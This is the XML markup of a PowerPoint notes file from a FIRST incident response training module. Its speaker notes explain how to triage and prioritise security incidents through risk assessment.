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6" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId48"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="301"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Lst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-GB"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:ea typeface="Droid Sans Fallback" charset="0"/>
        <a:cs typeface="Droid Sans Fallback" charset="0"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:ea typeface="Droid Sans Fallback" charset="0"/>
        <a:cs typeface="Droid Sans Fallback" charset="0"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:ea typeface="Droid Sans Fallback" charset="0"/>
        <a:cs typeface="Droid Sans Fallback" charset="0"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:ea typeface="Droid Sans Fallback" charset="0"/>
        <a:cs typeface="Droid Sans Fallback" charset="0"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:ea typeface="Droid Sans Fallback" charset="0"/>
        <a:cs typeface="Droid Sans Fallback" charset="0"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:ea typeface="Droid Sans Fallback" charset="0"/>
        <a:cs typeface="Droid Sans Fallback" charset="0"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:ea typeface="Droid Sans Fallback" charset="0"/>
        <a:cs typeface="Droid Sans Fallback" charset="0"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:ea typeface="Droid Sans Fallback" charset="0"/>
        <a:cs typeface="Droid Sans Fallback" charset="0"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:ea typeface="Droid Sans Fallback" charset="0"/>
        <a:cs typeface="Droid Sans Fallback"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450"/>
    <a:srgbClr val="53CB5C"/>
    <a:srgbClr val="48B050"/>
    <a:srgbClr val="009B17"/>
    <a:srgbClr val="007417"/>
    <a:srgbClr val="92EB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7"/>
    <p:restoredTop sz="94666"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="102" d="100"/>
          <a:sy n="102" d="100"/>
        </p:scale>
        <p:origin x="1208" y="184"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr varScale="1">
      <p:scale>
        <a:sx n="170" d="200"/>
        <a:sy n="170" d="200"/>
      </p:scale>
      <p:origin x="-780" y="-84"/>
    </p:cViewPr>
  </p:outlineViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesText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46" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{914429E3-A9C9-6B41-B2B8-90A6596F86D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="763588"/>
            <a:ext cx="5027613" cy="3770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9218" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FADBE73-6DD9-F74D-A4FB-F60E55282672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="777875" y="4776788"/>
            <a:ext cx="6216650" cy="4524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endParaRPr lang="en-US" altLang="en-US" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E0F0F73-E815-9342-B4E5-33C60319BA2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="337185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eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>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sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9220" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EAA3B6A-88F9-2B4A-A497-BD1F086BD321}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4398963" y="0"/>
            <a:ext cx="337185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r" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>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sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9221" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C326D847-9CDD-6742-9614-C4D33B0BF65F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9555163"/>
            <a:ext cx="337185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eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>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sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9222" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EB6D2CF-42B4-B54B-812D-858D74E3BAC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4398963" y="9555163"/>
            <a:ext cx="337185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r" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>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Lst>
              <a:defRPr sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A96AA73E-8DC6-A24A-BB0A-88A85174D4A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1pPr>
    <a:lvl2pPr marL="742950" indent="-28575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2pPr>
    <a:lvl3pPr marL="11430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3pPr>
    <a:lvl4pPr marL="16002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4pPr>
    <a:lvl5pPr marL="20574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194" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{034B744F-95D3-2449-8593-4A712B095E42}"/>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B91575B3-B4C6-E943-8A9A-A6E3C74843F7}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F56ECAE-232A-8C4D-B125-E6B6D0C53CE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631825" y="4343400"/>
            <a:ext cx="5592763" cy="64484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215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="77"/>
                <a:ea typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="77"/>
                <a:cs typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>IMPORTANT: notes are work in progress and might not be up-to-date or missing!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPct val="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endParaRPr lang="en-US" altLang="en-US" b="1">
              <a:latin typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="77"/>
              <a:ea typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="77"/>
              <a:cs typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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endParaRPr lang="en-US" altLang="en-US" b="1">
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Module 5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>0 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>In Module 5, we will research the Analysis process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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b="1" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Total module: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>115 minutes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8196" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C1C03EA-A848-484B-A0DC-4E9C21A86C32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8197" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5011DA80-A0D1-C745-96BD-69C999B58F4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="8931275"/>
            <a:ext cx="2970213"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{0CF742CE-4D45-0A47-A90D-B27D70760959}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans"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8" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3791F6C-F7F8-3746-830F-FF52B04120CF}"/>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D7051BF9-E1BE-804E-A451-5BC6365BC770}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EFCEDCB-C8A0-0C4D-98B3-B96305E5BBA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631825" y="4343400"/>
            <a:ext cx="5592763" cy="64484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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Triage Constantly in the Background: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>2 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> Triage is simply the prioritization of the bucket of input data you are dealing with at a given moment. For example, you can expect that when a threat appears against your organization, you’ll put that Annual US-CERT Trends report aside. Of course, most of the time making the triage or prioritization decision will be more difficult than this simple example. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>As you are prioritizing your incoming events, it is critical that you define the severity as it relates to your constituency, in other words, conduct a risk assessment. Consider two examples: an ISP vs. an online seller. The relative prioritization of any particular attack will be different. You will have to determine both the particular resources and resource types that have been affected, and also the percentage of those resources being affected.</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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Of course, each time a new incident arrives you have to re-examine all the incidents and prioritize again. This could mean you continue to work on this incident, or perhaps you will move to the newly arrived one.</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> The next step in investigation is finding additional sources of data you can combine into a significant conclusion.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24580" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC28D5E6-1BFD-DB4C-9FA5-D3DD5FC721BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{1B492CA4-37AF-9C42-B2CA-C33753753C8B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24581" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{338D61D0-44E6-6646-B95E-0B62DCEDEA19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
